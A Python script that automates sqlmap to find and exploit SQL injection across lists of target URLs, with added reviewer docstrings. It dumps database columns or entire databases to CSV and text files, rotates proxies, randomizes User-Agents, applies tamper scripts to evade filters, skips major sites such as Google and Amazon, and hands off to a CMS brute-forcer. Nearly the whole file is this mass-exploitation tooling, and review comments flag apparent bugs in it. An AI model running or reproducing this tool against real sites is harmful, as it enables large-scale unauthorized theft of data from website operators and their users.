#!/usr/bin/env python
#coding: utf-8
from multiprocessing.dummy import Pool
from subprocess import Popen, PIPE, call, check_call
import os
import re
import sys
import glob
import time
import shutil
import logging
import urlparse
import requests
#import Exploits
import traceback
import threading
import builtwith
from random import choice
#from urlparse import urlparse
from datetime import datetime
from psutil import Process, TimeoutExpired
from requests import get
from brutecms import brutecont
from requests.exceptions import ReadTimeout, ConnectTimeout
import wrapper_config
# Column name(s) later interpolated into sqlmap's "-C" argument: the first
# command-line argument when present, otherwise the configured default.
dump = sys.argv[1] if len(sys.argv) > 1 else wrapper_config.COLUMN_DUMP

# Refuse to start when Check_SQLi, DUMP and DUMP_ALL are either all enabled or
# all disabled while both CMS modes are off; the same hint is printed in both
# cases.
if (
    wrapper_config.Check_SQLi == True
    and wrapper_config.DUMP == True
    and wrapper_config.DUMP_ALL == True
    and wrapper_config.BRUTE_CMS == False
    and wrapper_config.EXPLOITS_CMS == False
) or (
    wrapper_config.Check_SQLi == False
    and wrapper_config.DUMP == False
    and wrapper_config.DUMP_ALL == False
    and wrapper_config.BRUTE_CMS == False
    and wrapper_config.EXPLOITS_CMS == False
):
    print('Check_SQLi or DUMP or DUMP_ALL or BRUTE_CMS or EXPLOITS_CMS')
    sys.exit()

# Working directories, all resolved relative to the directory holding this
# script (symlinks resolved by realpath).
DUMP_SQLMAP_FOLDER = os.path.join(os.path.dirname(os.path.realpath(__file__)), wrapper_config.DUMP_FOLDER)
DUMP_SQLMAP_SAVE = os.path.join(os.path.dirname(os.path.realpath(__file__)), wrapper_config.SQLMAP_DUMPS)
print(DUMP_SQLMAP_SAVE)
DUMP_TXT_FOLDER = os.path.join(os.path.dirname(os.path.realpath(__file__)), wrapper_config.WRAPPER_TXT_DUMPS)
print(DUMP_TXT_FOLDER)

# Thresholds compared against the per-table numbers in sqlmap_check().
STEPS = [
    10, 100, 300, 500, 1000, 1500, 2000, 3000, 5000,
    10000, 20000, 50000, 100000,
]
#STEPS = [100]
def checkcms(url):
    """Return ``"<url> | CMS: <name>"`` from builtwith's ``"cms"`` result.

    Any exception (failed lookup, missing ``"cms"`` key, empty list) hands the
    URL to ``checkencoom`` instead.
    """
    try:
        detected = builtwith.builtwith(url)
        return url + " | CMS: " + detected["cms"][0]
    except:
        # Bare except kept on purpose: every failure takes the fallback path.
        return checkencoom(url)
def checkencoom(url):
    """Return ``"<url> | CMS: <name>"`` from builtwith's ``"ecommerce"`` result.

    Returns the fixed string ``"CMS: Not found"`` (without the URL) when the
    lookup raises or the key is absent.
    """
    try:
        detected = builtwith.builtwith(url)
        return url + " | CMS: " + detected["ecommerce"][0]
    except:
        return "CMS: Not found"
def sqlmap_check(url, pos, check_timeout, proxy=None):
    """Run one sqlmap pass against ``url``, then call ``sqlmap_dump`` for large tables.

    Spawns ``python sqlmap.py`` (resolved against the current working
    directory) as a child process, waits up to ``check_timeout`` for it via
    psutil and then kills it. One of three argument lists is chosen from
    ``wrapper_config.PROXY`` and the proxy credentials. Afterwards the mapping
    returned by ``log_num_parser`` (not defined in the visible part of this
    file) is walked and ``sqlmap_dump`` is called for tables whose number
    exceeds entries of ``STEPS``.

    Args:
        url: Target URL placed in ``--url=``.
        pos: Counter of remaining URLs; only printed.
        check_timeout: Timeout passed to ``psutil.Process.wait`` (callers in
            this file pass 56000).
        proxy: Value appended after ``PROXY_TYPE://`` for ``--proxy``.

    Returns:
        False when ``domains_dublicate(url)`` is truthy, otherwise None.

    Defender note: every variant sends a randomized User-Agent
    (``--random-agent``) and payloads rewritten by the configured tamper
    script, so detection keyed on sqlmap's default User-Agent or on unmodified
    payloads will likely miss this traffic. ``--technique=EUSQ`` restricts the
    run to error-based, UNION, stacked and inline-query tests.

    NOTE(review): the reviewed copy had lost its indentation; the nesting
    below is reconstructed and should be confirmed against the original.
    """
    print('set %s' % url)
    print('left %s url(s)' % pos)
    if proxy:
        print('set proxy %s://%s' % (wrapper_config.PROXY_TYPE, proxy))
    start_time = datetime.now().time()  # recorded but never read below
    if wrapper_config.PROXY and wrapper_config.PROXY_USERNAME and wrapper_config.PROXY_PASSWORD:
        # Authenticated proxy. --proxy-cred places the proxy username and
        # password on the child's command line, where local process listings
        # can read them.
        process = Popen(
            [
                'python',
                'sqlmap.py',
                '--url=%s' % url,
                '--batch',
                '--level=%s' % wrapper_config.LEVEL,
                '--risk=%s' % wrapper_config.RISK,
                '--random-agent',
                '--threads=3',
                '--count',
                '--tamper=%s' % wrapper_config.TAMPER,
                '--dump-format=CSV',
                '--answers=quit=n,crack=n',
                '--search',
                # Single argv element "-C <dump>" with an embedded space.
                '-C %s' % dump,
                '--output-dir=%s' % DUMP_SQLMAP_SAVE,
                '--proxy=%s://%s' % (
                    wrapper_config.PROXY_TYPE,
                    proxy),
                '--proxy-cred=%s:%s' % (
                    wrapper_config.PROXY_USERNAME,
                    wrapper_config.PROXY_PASSWORD),
                '--exclude-sysdbs',
                '--timeout=%s' % wrapper_config.TIMEOUT,
                '--retries=%s' % wrapper_config.RETRIES,
                '--technique=EUSQ',
            ])
        psu_process = Process(process.pid)
        try:
            psu_process.wait(check_timeout)
        except TimeoutExpired: pass
        # kill() is attempted unconditionally; any error (for example the
        # child having already exited) is swallowed.
        try:
            psu_process.kill()
        except: pass
    elif wrapper_config.PROXY:
        # Proxy without credentials: same list minus --proxy-cred.
        process = Popen(
            [
                'python',
                'sqlmap.py',
                '--url=%s' % url,
                '--batch',
                '--level=%s' % wrapper_config.LEVEL,
                '--risk=%s' % wrapper_config.RISK,
                '--random-agent',
                '--threads=3',
                '--count',
                '--tamper=%s' % wrapper_config.TAMPER,
                '--dump-format=CSV',
                '--answers=quit=n,crack=n',
                '--search',
                '-C %s' % dump,
                #'--answers="quit=n, crack=n"'
                '--output-dir=%s' % DUMP_SQLMAP_SAVE,
                #'--proxy=socks5://localhost:9091',
                '--proxy=%s://%s' % (
                    wrapper_config.PROXY_TYPE,
                    proxy),
                '--exclude-sysdbs',
                '--timeout=%s' % wrapper_config.TIMEOUT,
                '--retries=%s' % wrapper_config.RETRIES,
                '--technique=EUSQ',
            ])
        psu_process = Process(process.pid)
        try:
            psu_process.wait(check_timeout)
        except TimeoutExpired: pass
        try:
            psu_process.kill()
        except: pass
    else:
        # Direct connection; this is the only variant that sets --time-sec.
        process = Popen(
            [
                'python',
                'sqlmap.py',
                '--url=%s' % url,
                '--batch',
                '--time-sec=30',
                '--level=%s' % wrapper_config.LEVEL,
                '--risk=%s' % wrapper_config.RISK,
                '--random-agent',
                '--threads=3',
                '--count',
                '--tamper=%s' % wrapper_config.TAMPER,
                '--search',
                '-C %s' % dump,
                '--dump-format=CSV',
                '--answers=quit=n,crack=n',
                '--output-dir=%s' % DUMP_SQLMAP_SAVE,
                #'--proxy=socks5://localhost:9091',
                '--exclude-sysdbs',
                '--timeout=%s' % wrapper_config.TIMEOUT,
                '--retries=%s' % wrapper_config.RETRIES,
                '--technique=EUSQ',
            ])
        psu_process = Process(process.pid)
        try:
            psu_process.wait(check_timeout)
        except TimeoutExpired: pass
        try:
            psu_process.kill()
        except: pass
    end_time = datetime.now().time()  # recorded but never read below
    # NOTE(review): with the file's `import urlparse`, domains_dublicate()
    # appears to always return False, so this early return looks unreachable
    # as written - confirm.
    if domains_dublicate(url):
        print('detect domains dublicate %s pass it' % url)
        return False
    # Iterated below as {db: {table: num}}; presumably the counts produced by
    # --count - confirm against log_num_parser.
    dbs_data = log_num_parser(url)
    #print dbs_data
    #sys.exit()
    if dbs_data:
        async_tables_pool = Pool()
        for db, tables in dbs_data.items():
            for table, num in tables.items():
                for step in STEPS: #STEPS = [10,100, 300, 500, 1000, 1500, 2000, 3000, 5000, 10000, 20000, 50000, 100000]
                    if int(num) > step:
                        try:
                            # sqlmap_dump(...) is evaluated right here, in the
                            # calling thread; its return value (None) is what
                            # apply_async receives. The same (url, 56000,
                            # proxy) call repeats for every threshold exceeded
                            # because `step` is not passed on.
                            async_tables_pool.apply_async(
                                sqlmap_dump(
                                    url,
                                    56000,
                                    proxy))
                        except:pass
                    else:
                        break
        async_tables_pool.close()
        async_tables_pool.join()
def sqlmap_dump(url, check_timeout, proxy=None):
    """Run sqlmap with ``--search -C <dump>`` against ``url`` and write CSV output.

    Spawns ``python sqlmap.py`` (resolved against the current working
    directory), waits up to ``check_timeout`` for it via psutil, then kills
    it. The argument list depends on ``wrapper_config.PROXY`` and the proxy
    credentials; results go to ``DUMP_SQLMAP_SAVE`` through ``--output-dir``.

    Args:
        url: Target URL placed in ``--url=``.
        check_timeout: Timeout passed to ``psutil.Process.wait``.
        proxy: Value appended after ``PROXY_TYPE://`` for ``--proxy``.

    Returns:
        None.
    """
    start_time = datetime.now().time()  # recorded but never read below
    if wrapper_config.PROXY and wrapper_config.PROXY_USERNAME and wrapper_config.PROXY_PASSWORD:
        # Authenticated proxy. --proxy-cred exposes the proxy username and
        # password on the child's command line (visible in process listings).
        process = Popen(
            [
                'python',
                'sqlmap.py',
                '--url=%s' % url,
                '--batch',
                '--time-sec=30',
                '--level=%s' % wrapper_config.LEVEL,
                '--risk=%s' % wrapper_config.RISK,
                '--random-agent',
                '--threads=3',
                '--answers=quit=n,crack=n',
                '--tamper=%s' % wrapper_config.TAMPER,
                '--search',
                # Single argv element "-C <dump>" with an embedded space.
                '-C %s' % dump,
                '--dump-format=CSV',
                '--output-dir=%s' % DUMP_SQLMAP_SAVE,
                '--proxy=%s://%s' % (
                    wrapper_config.PROXY_TYPE,
                    proxy),
                '--proxy-cred=%s:%s' % (
                    wrapper_config.PROXY_USERNAME,
                    wrapper_config.PROXY_PASSWORD),
                '--exclude-sysdbs',
                '--timeout=%s' % wrapper_config.TIMEOUT,
                '--retries=%s' % wrapper_config.RETRIES,
                '--technique=EUSQ',
            ])
        psu_process = Process(process.pid)
        try:
            psu_process.wait(check_timeout)
        except TimeoutExpired: pass
        # kill() is attempted unconditionally; any error is swallowed.
        try:
            psu_process.kill()
        except: pass
    elif wrapper_config.PROXY:
        # Proxy without credentials; this variant sets no --time-sec.
        process = Popen(
            [
                'python',
                'sqlmap.py',
                '--url=%s' % url,
                '--batch',
                '--level=%s' % wrapper_config.LEVEL,
                '--risk=%s' % wrapper_config.RISK,
                '--random-agent',
                '--threads=3',
                '--answers=quit=n,crack=n',
                '--tamper=%s' % wrapper_config.TAMPER,
                '--search',
                '-C %s' % dump,
                '--dump-format=CSV',
                '--output-dir=%s' % DUMP_SQLMAP_SAVE,
                '--proxy=%s://%s' % (
                    wrapper_config.PROXY_TYPE,
                    proxy),
                '--exclude-sysdbs',
                '--timeout=%s' % wrapper_config.TIMEOUT,
                '--retries=%s' % wrapper_config.RETRIES,
                '--technique=EUSQ',
            ])
        psu_process = Process(process.pid)
        try:
            psu_process.wait(check_timeout)
        except TimeoutExpired: pass
        try:
            psu_process.kill()
        except: pass
    else:
        # Direct connection.
        process = Popen(
            [
                'python',
                'sqlmap.py',
                '--url=%s' % url,
                '--time-sec=15',
                '--batch',
                '--level=%s' % wrapper_config.LEVEL,
                '--risk=%s' % wrapper_config.RISK,
                '--random-agent',
                '--threads=3',
                '--answers=quit=n,crack=n',
                '--tamper=%s' % wrapper_config.TAMPER,
                '--search',
                '-C %s' % dump,
                '--dump-format=CSV',
                '--output-dir=%s' % DUMP_SQLMAP_SAVE,
                #'--proxy=socks5://localhost:9091',
                '--exclude-sysdbs',
                '--timeout=%s' % wrapper_config.TIMEOUT,
                '--retries=%s' % wrapper_config.RETRIES,
                '--technique=EUSQ',
            ])
        psu_process = Process(process.pid)
        try:
            psu_process.wait(check_timeout)
        except TimeoutExpired: pass
        try:
            psu_process.kill()
        except: pass
def sqlmap_dump_all(url, pos, check_timeout, proxy=None):
    """Run sqlmap with ``--dump-all`` (system databases excluded) against ``url``.

    Spawns ``python sqlmap.py`` (resolved against the current working
    directory), waits up to ``check_timeout`` for it via psutil, then kills
    it. CSV output goes to ``DUMP_SQLMAP_SAVE``; the argument list depends on
    ``wrapper_config.PROXY`` and the proxy credentials.

    Args:
        url: Target URL placed in ``--url=``.
        pos: Counter of remaining URLs; only printed.
        check_timeout: Timeout passed to ``psutil.Process.wait``.
        proxy: Value appended after ``PROXY_TYPE://`` for ``--proxy``.

    Returns:
        None.
    """
    print "Dump All"
    print('set %s' % url)
    print('left %s url(s)' % pos)
    start_time = datetime.now().time()  # recorded but never read below
    if wrapper_config.PROXY and wrapper_config.PROXY_USERNAME and wrapper_config.PROXY_PASSWORD:
        # Authenticated proxy. --proxy-cred exposes the proxy username and
        # password on the child's command line (visible in process listings).
        process = Popen(
            [
                'python',
                'sqlmap.py',
                '--url=%s' % url,
                '--batch',
                '--time-sec=30',
                '--level=%s' % wrapper_config.LEVEL,
                '--risk=%s' % wrapper_config.RISK,
                '--random-agent',
                '--threads=3',
                '--answers=quit=n,crack=n',
                '--tamper=%s' % wrapper_config.TAMPER,
                '--dump-all',
                '--dump-format=CSV',
                '--output-dir=%s' % DUMP_SQLMAP_SAVE,
                '--proxy=%s://%s' % (
                    wrapper_config.PROXY_TYPE,
                    proxy),
                '--proxy-cred=%s:%s' % (
                    wrapper_config.PROXY_USERNAME,
                    wrapper_config.PROXY_PASSWORD),
                '--exclude-sysdbs',
                '--timeout=%s' % wrapper_config.TIMEOUT,
                '--retries=%s' % wrapper_config.RETRIES,
                '--technique=EUSQ',
            ])
        psu_process = Process(process.pid)
        try:
            psu_process.wait(check_timeout)
        except TimeoutExpired: pass
        # kill() is attempted unconditionally; any error is swallowed.
        try:
            psu_process.kill()
        except: pass
    elif wrapper_config.PROXY:
        # Proxy without credentials; this variant sets no --time-sec.
        process = Popen(
            [
                'python',
                'sqlmap.py',
                '--url=%s' % url,
                '--batch',
                '--level=%s' % wrapper_config.LEVEL,
                '--risk=%s' % wrapper_config.RISK,
                '--random-agent',
                '--threads=3',
                '--answers=quit=n,crack=n',
                '--tamper=%s' % wrapper_config.TAMPER,
                '--dump-all',
                '--dump-format=CSV',
                '--output-dir=%s' % DUMP_SQLMAP_SAVE,
                '--proxy=%s://%s' % (
                    wrapper_config.PROXY_TYPE,
                    proxy),
                '--exclude-sysdbs',
                '--timeout=%s' % wrapper_config.TIMEOUT,
                '--retries=%s' % wrapper_config.RETRIES,
                '--technique=EUSQ',
            ])
        psu_process = Process(process.pid)
        try:
            psu_process.wait(check_timeout)
        except TimeoutExpired: pass
        try:
            psu_process.kill()
        except: pass
    else:
        # Direct connection.
        process = Popen(
            [
                'python',
                'sqlmap.py',
                '--url=%s' % url,
                '--time-sec=15',
                '--batch',
                '--level=%s' % wrapper_config.LEVEL,
                '--risk=%s' % wrapper_config.RISK,
                '--random-agent',
                '--threads=3',
                '--answers=quit=n,crack=n',
                '--tamper=%s' % wrapper_config.TAMPER,
                '--dump-all',
                '--dump-format=CSV',
                '--output-dir=%s' % DUMP_SQLMAP_SAVE,
                #'--proxy=socks5://localhost:9091',
                '--exclude-sysdbs',
                '--timeout=%s' % wrapper_config.TIMEOUT,
                '--retries=%s' % wrapper_config.RETRIES,
                '--technique=EUSQ',
            ])
        psu_process = Process(process.pid)
        try:
            psu_process.wait(check_timeout)
        except TimeoutExpired:pass
        try:
            psu_process.kill()
        except:pass
def sqli_check(url, pos, check_timeout, proxy=None):
    """Run a detection-only sqlmap pass against ``url`` (no dump options).

    Spawns ``python sqlmap.py`` (resolved against the current working
    directory), waits up to ``check_timeout`` for it via psutil, then kills
    it. sqlmap's session files land under ``DUMP_SQLMAP_SAVE``; ``find_dump``
    later inspects the ``log`` files there.

    Args:
        url: Target URL placed in ``--url=``.
        pos: Counter of remaining URLs; only printed.
        check_timeout: Timeout passed to ``psutil.Process.wait``.
        proxy: Value appended after ``PROXY_TYPE://`` for ``--proxy``.

    Returns:
        None.
    """
    print "Find SQLi"
    print('set %s' % url)
    print('left %s url(s)' % pos)
    if proxy:
        print('set proxy %s://%s' % (wrapper_config.PROXY_TYPE, proxy))
    start_time = datetime.now().time()  # recorded but never read below
    if wrapper_config.PROXY and wrapper_config.PROXY_USERNAME and wrapper_config.PROXY_PASSWORD:
        # Authenticated proxy. --proxy-cred exposes the proxy username and
        # password on the child's command line (visible in process listings).
        process = Popen(
            [
                'python',
                'sqlmap.py',
                '--url=%s' % url,
                '--batch',
                '--time-sec=30',
                '--level=%s' % wrapper_config.LEVEL,
                '--risk=%s' % wrapper_config.RISK,
                '--random-agent',
                '--threads=3',
                '--answers=quit=n,crack=n',
                '--tamper=%s' % wrapper_config.TAMPER,
                '--output-dir=%s' % DUMP_SQLMAP_SAVE,
                '--proxy=%s://%s' % (
                    wrapper_config.PROXY_TYPE,
                    proxy),
                '--proxy-cred=%s:%s' % (
                    wrapper_config.PROXY_USERNAME,
                    wrapper_config.PROXY_PASSWORD),
                '--timeout=%s' % wrapper_config.TIMEOUT,
                '--retries=%s' % wrapper_config.RETRIES,
                '--technique=EUSQ',
            ])
        psu_process = Process(process.pid)
        try:
            psu_process.wait(check_timeout)
        except TimeoutExpired: pass
        # kill() is attempted unconditionally; any error is swallowed.
        try:
            psu_process.kill()
        except: pass
    elif wrapper_config.PROXY:
        # Proxy without credentials. Unlike the other two variants this list
        # carries neither --time-sec nor --technique, so sqlmap's defaults
        # apply for both.
        process = Popen(
            [
                'python',
                'sqlmap.py',
                '--url=%s' % url,
                '--batch',
                '--level=%s' % wrapper_config.LEVEL,
                '--risk=%s' % wrapper_config.RISK,
                '--random-agent',
                '--threads=3',
                '--answers=quit=n,crack=n',
                '--tamper=%s' % wrapper_config.TAMPER,
                '--output-dir=%s' % DUMP_SQLMAP_SAVE,
                '--proxy=%s://%s' % (
                    wrapper_config.PROXY_TYPE,
                    proxy),
                '--timeout=%s' % wrapper_config.TIMEOUT,
                '--retries=%s' % wrapper_config.RETRIES,
            ])
        psu_process = Process(process.pid)
        try:
            psu_process.wait(check_timeout)
        except TimeoutExpired: pass
        try:
            psu_process.kill()
        except: pass
    else:
        # Direct connection.
        process = Popen(
            [
                'python',
                'sqlmap.py',
                '--url=%s' % url,
                '--time-sec=15',
                '--batch',
                '--level=%s' % wrapper_config.LEVEL,
                '--risk=%s' % wrapper_config.RISK,
                '--random-agent',
                '--threads=3',
                '--answers=quit=n,crack=n',
                '--tamper=%s' % wrapper_config.TAMPER,
                '--output-dir=%s' % DUMP_SQLMAP_SAVE,
                '--timeout=%s' % wrapper_config.TIMEOUT,
                '--retries=%s' % wrapper_config.RETRIES,
                '--technique=EUSQ',
            ])
        psu_process = Process(process.pid)
        try:
            psu_process.wait(check_timeout)
        except TimeoutExpired: pass
        try:
            psu_process.kill()
        except: pass
def domains_dublicate(url):
    """Report whether the host of ``url`` was already recorded.

    A host seen for the first time is appended to the module-level
    ``dublicates`` list and to ``dublicat.txt`` in the working directory.
    Any exception yields False.

    NOTE(review): the file's imports bind ``urlparse`` to the module, so the
    call below appears to raise and this function returns False on every
    call as written - confirm.
    """
    try:
        # Splitting on ':' drops a port when one is present and leaves a bare
        # host unchanged.
        host = urlparse(url).netloc.split(':')[0]
        if host in dublicates:
            return True
        dublicates.append(host)
        open('dublicat.txt', 'a+').write(host + '\n')
        return False
    except:
        return False
def clean_url(url):
    """Return ``url`` truncated at its first single quote, if it has one."""
    head, _quote, _rest = url.partition("'")
    return head
def get_proxies(url):
    """Download ``url`` and return its body split into lines.

    Exits the program on a connect or read timeout (120 s limit); other
    request errors propagate to the caller.
    """
    try:
        response = get(url, timeout=120)
        return response.text.splitlines()
    except (ConnectTimeout, ReadTimeout):
        print('cant grab proxies %s ; check link' % url)
        sys.exit()
def find_dump():
    """Collect results from sqlmap's per-target ``log`` files.

    For every entry under ``DUMP_SQLMAP_SAVE``, a non-empty file named
    ``log`` causes the fifth ``/``-separated component of its directory to be
    appended to ``wrapper_config.SQLi_SAVE_FILE`` and the log's lines to be
    appended to ``./log``. An empty ``log`` removes the whole entry when
    ``wrapper_config.DELETE`` is True.

    NOTE(review): the reviewed copy had lost its indentation; the nesting
    below is reconstructed and should be confirmed against the original.
    """
    for target_dir in glob.glob(DUMP_SQLMAP_SAVE+"/**"):
        for dirpath, dirnames, files in os.walk(target_dir):
            for name in files:
                if name != 'log':
                    continue
                log_path = dirpath + '/' + name
                if os.path.getsize(log_path) > 0:
                    # Index 4 is tied to the depth of DUMP_SQLMAP_SAVE on disk.
                    url = dirpath.split('/')[4]
                    open(wrapper_config.SQLi_SAVE_FILE, 'a+').write(str(url) + '\n')
                    log_file = open(log_path)
                    open('log', 'a+').write(dirpath + '\n')
                    for line in log_file:
                        open('log', 'a+').write(line + '\n')
                    del_dub(wrapper_config.SQLi_SAVE_FILE)
                elif wrapper_config.DELETE == True:
                    shutil.rmtree(target_dir)
def save_txt():
    """Copy every ``.csv`` under ``DUMP_SQLMAP_SAVE`` into ``DUMP_TXT_FOLDER``.

    Each file name seen during the walk is printed. Copies are written flat
    (no sub-directories) with ``.csv`` replaced by ``.txt`` in the name.
    """
    for root, dirs, files in os.walk(DUMP_SQLMAP_SAVE):
        for name in files:
            print(name)
            if not name.endswith(".csv"):
                continue
            source_path = os.path.join(root, name)
            target_name = name.replace('.csv', '.txt')
            shutil.copy(source_path, DUMP_TXT_FOLDER + '/' + target_name)
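def del_dub(file):
    """Rewrite ``file`` in place without blank or duplicate lines.

    The first occurrence of each line is kept and the original line order is
    preserved (the previous ``set()``-based version left the order
    arbitrary). File handles are closed explicitly instead of being left to
    the garbage collector, and the result is written in one pass rather than
    by re-opening the file once per line.

    Args:
        file: Path of the text file to deduplicate.
    """
    with open(file) as handle:
        lines = handle.read().split('\n')

    seen = set()
    unique = []
    for line in lines:
        # Empty strings come from blank lines and the trailing newline.
        if line and line not in seen:
            seen.add(line)
            unique.append(line)

    with open(file, 'w') as handle:
        handle.writelines(line + '\n' for line in unique)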
def sites_dev():
    """Normalise ``wrapper_config.URLS_FILE`` and exit when it ends up empty.

    When ``wrapper_config.Check_List`` is True: entries lacking an
    ``http://``/``https://`` prefix are appended again with ``http://`` in
    front, the file is deduplicated, and it is then rewritten keeping only
    lines that contain "http" and none of the hard-coded site names. The
    rewrite is skipped when nothing passes the filter.

    NOTE(review): the reviewed copy had lost its indentation; the nesting
    below is reconstructed and should be confirmed against the original.
    """
    if wrapper_config.Check_List == True:
        print('Check list target')
        kept = []
        scheme_re = re.compile(r'^(?:http)s?://', re.IGNORECASE)
        for entry in open(wrapper_config.URLS_FILE).read().splitlines():
            has_scheme = re.match(scheme_re, entry) is not None
            if len(entry) > 0 and has_scheme != True:
                open(wrapper_config.URLS_FILE, 'a+').write('http://' + entry + '\n')
        del_dub(wrapper_config.URLS_FILE)

        # Substring match against the whole line, not just the host.
        skipped_names = (
            "facebook", "ebay", "youtube", "google", "cxsecurity",
            "pastebin", "amazon", "microsoft", "yahoo",
        )
        for entry in open(wrapper_config.URLS_FILE).read().splitlines():
            if any(name in entry for name in skipped_names):
                continue
            if "http" in entry and len(entry) > 0:
                kept.append(entry + '\n')
        if kept:
            f = open(wrapper_config.URLS_FILE, 'w')
            f.writelines(kept)
            f.close()
        del_dub(wrapper_config.URLS_FILE)
    if os.stat(wrapper_config.URLS_FILE).st_size == 0:
        print('No target')
        sys.exit()
def get_dump_size(url):
    """Return the size of ``<DUMP_SQLMAP_FOLDER>/<host>/dump`` divided by 1024.

    The host is the netloc of ``url`` with any port removed; sizes of all
    files below the folder are summed in bytes before the division.

    NOTE(review): the file's imports bind ``urlparse`` to the module, so the
    first call below appears to raise as written - confirm.
    """
    host = urlparse(url).netloc.split(':')[0]
    dump_root = os.path.join(DUMP_SQLMAP_FOLDER, host, 'dump')
    size_bytes = sum(
        os.path.getsize(os.path.join(dirpath, name))
        for dirpath, _dirnames, filenames in os.walk(dump_root)
        for name in filenames
    )
    return size_bytes/1024
# Hosts already recorded by domains_dublicate(); reset to [] by threads().
dublicates = None
def threads():
    """Drive one session: fan the URL list out to worker threads, then post-process.

    Steps visible here: decide between a new and a resumed session from
    ``wrapper_config.LOG_FILE``, read ``wrapper_config.URLS_FILE``, optionally
    load proxies, submit one task per URL and enabled mode (``Check_SQLi``,
    ``DUMP``, ``DUMP_ALL``) to a thread pool per chunk of ``URLS_LIMIT`` URLs,
    and finally call ``find_dump``, ``save_txt`` and ``brutecont``.

    NOTE(review): the reviewed copy had lost its indentation; the nesting
    below is reconstructed and should be confirmed against the original.
    """
    global dublicates
    dublicates = []
    new = False
    # New session when the log cannot be read, has at most two lines, or
    # contains the marker 'all work done'.
    try:
        logfile = open(wrapper_config.LOG_FILE).read().splitlines()
    except: new = True
    else:
        if len(logfile) > 2:
            for line in logfile:
                if 'all work done' in line:
                    new = True
        else:
            new = True
    if new:
        if wrapper_config.DEBUG:
            # filemode='w' truncates the previous log.
            logging.basicConfig(
                level=logging.DEBUG,
                filename=wrapper_config.LOG_FILE,
                filemode='w')
        print('starting new session')
        try:
            urls = open(wrapper_config.URLS_FILE).read().splitlines()
        except IOError:
            print('cant open %s check file' % wrapper_config.URLS_FILE)
            sys.exit()
    else:
        if wrapper_config.DEBUG:
            logging.basicConfig(
                level=logging.DEBUG,
                filename=wrapper_config.LOG_FILE,
                filemode='a')
        print('detect previous session, restore')
        try:
            urls = open(wrapper_config.URLS_FILE).read().splitlines()
            #print urls
        except IOError:
            print('cant open %s check file' % wrapper_config.URLS_FILE)
            sys.exit()
        # Search the log backwards for the last ':set <url>' entry.
        # lasturl_index is computed but not read anywhere in the visible
        # code, so the loops below still start from the first URL.
        for line in reversed(logfile):
            if ':set' in line:
                try:
                    lasturl = line.split(':set ')[1]
                    lasturl_index = urls.index(lasturl) + 1
                except: print('cant detect last url %s in task' % lasturl)
                else:
                    print('detect last url in task %s' % lasturl)
                    break
    proxies = []
    if wrapper_config.PROXY:
        if wrapper_config.PROXY_FILE:
            proxies = open(wrapper_config.PROXY_FILE).read().splitlines()
            print('get proxies from %s' % wrapper_config.PROXY_FILE)
    for lim in range(0, len(urls), wrapper_config.URLS_LIMIT):
        urls_chunk = urls[lim:lim + wrapper_config.URLS_LIMIT]
        # multiprocessing.dummy.Pool is a thread pool; each task in turn
        # spawns its own sqlmap child process.
        pool = Pool(wrapper_config.THREADS)
        for index, url in enumerate(urls_chunk):
            try:
                position = len(urls) - urls.index(url)
            except:
                position = 0
            # The AsyncResult objects returned by apply_async are discarded,
            # so an exception raised inside a worker is never surfaced here.
            # 56000 is the check_timeout handed to each worker.
            if wrapper_config.Check_SQLi == True:
                if wrapper_config.PROXY:
                    # choice() raises IndexError when `proxies` is empty.
                    pool.apply_async(sqli_check, (
                        clean_url(url),
                        position, 56000, choice(proxies)))
                else:
                    pool.apply_async(sqli_check, (
                        clean_url(url),
                        position, 56000))
            if wrapper_config.DUMP == True:
                if wrapper_config.PROXY:
                    pool.apply_async(sqlmap_check, (
                        clean_url(url),
                        position, 56000, choice(proxies)))
                else:
                    pool.apply_async(sqlmap_check,
                        (clean_url(url), position, 56000))
            if wrapper_config.DUMP_ALL == True:
                if wrapper_config.PROXY:
                    pool.apply_async(sqlmap_dump_all, (
                        clean_url(url),
                        position, 56000, choice(proxies)))
                else:
                    pool.apply_async(sqlmap_dump_all,
                        (clean_url(url), position, 56000))
        # Wait for the whole chunk before starting the next one.
        pool.close()
        pool.join()
    find_dump()
    save_txt()
    brutecont()
    #exploit()
# Script entry: normalise the URL list, then run the session. Runs on import
# as well, since there is no __main__ guard.
try:
    sites_dev()
    threads()
except KeyboardInterrupt:
    # On Ctrl-C, still copy the CSV files written so far before exiting.
    save_txt()
    sys.exit()